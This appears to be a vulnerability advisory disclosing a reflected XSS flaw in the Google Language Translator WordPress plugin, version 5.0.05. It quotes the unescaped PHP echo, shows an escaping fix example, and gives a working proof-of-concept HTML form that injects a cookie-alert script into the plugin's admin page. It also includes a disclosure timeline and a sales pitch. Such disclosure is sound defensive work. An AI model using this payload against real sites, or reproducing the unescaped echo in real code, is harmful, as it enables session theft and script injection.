04 Apr

Reflected Cross-Site Scripting (XSS) Vulnerability in Google Language Translator

We recently discovered the Google Language Translator plugin has a reflected cross-site scripting (XSS) vulnerability. In version 5.0.05, and some prior versions, the file /google-language-translator.php was echoing a POST variable without escaping it. That occurs on line 1207:

<td><?php if (isset ($_POST['googlelanguagetranslator_flags_order']) ) { echo $_POST['googlelanguagetranslator_flags_order']; } ?></td>
 </tr>
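
The following is an added example, not the plugin's code and not necessarily how version 5.0.06 fixed the issue: it renders the same table cell with the POST value escaped for an HTML text context. The function name and sample inputs are hypothetical, and plain PHP's htmlspecialchars() is used so the block runs without WordPress (inside WordPress, esc_html() is the usual call for this context).

```php
<?php
/**
 * Hypothetical helper (added example): build the table cell that line 1207
 * prints, escaping the submitted value before it reaches the page.
 */
function render_flags_order_cell(array $post): string
{
    $key = 'googlelanguagetranslator_flags_order';

    // A request may send key[]=... which makes the value an array.
    // Treat anything that is not a string as if it were absent.
    $value = (isset($post[$key]) && is_string($post[$key])) ? $post[$key] : '';

    // ENT_QUOTES escapes both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<td>' . $safe . '</td>';
}

// Constructed sample request bodies. The "poc" value is the one used in the
// proof of concept on this page; the others are made up for illustration.
$samples = [
    'benign'  => ['googlelanguagetranslator_flags_order' => 'constructed-benign-value'],
    'poc'     => ['googlelanguagetranslator_flags_order' => '<script>alert(document.cookie);</script>'],
    'array'   => ['googlelanguagetranslator_flags_order' => ['x']],
    'missing' => [],
];

foreach ($samples as $name => $post) {
    // The markup characters in the "poc" value come out as HTML entities,
    // so the browser displays them as text instead of running a script.
    echo $name, ': ', render_flags_order_cell($post), PHP_EOL;
}
```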

Proof Of Concept

The following proof of concept page will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/options-general.php?page=google_language_translator" method="post">
<input type="hidden" name="googlelanguagetranslator_flags_order" value="<script>alert(document.cookie);</script>" />
<input type="submit" value="submit" />
</form>
</body>
</html>

Timeline

  • 3/28/2016 – Developer notified.
  • 4/4/2016 – WordPress Plugin Directory notified.
  • 4/5/2016 – Plugin removed from WordPress Plugin Directory.
  • 4/18/2016 – Version 5.0.06 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us, we review the plugin for issues that hackers would exploit if they knew about them, as well as making sure that needed security checks have been implemented in the plugin. If you order two reviews, you will receive a free lifetime subscription to our service.
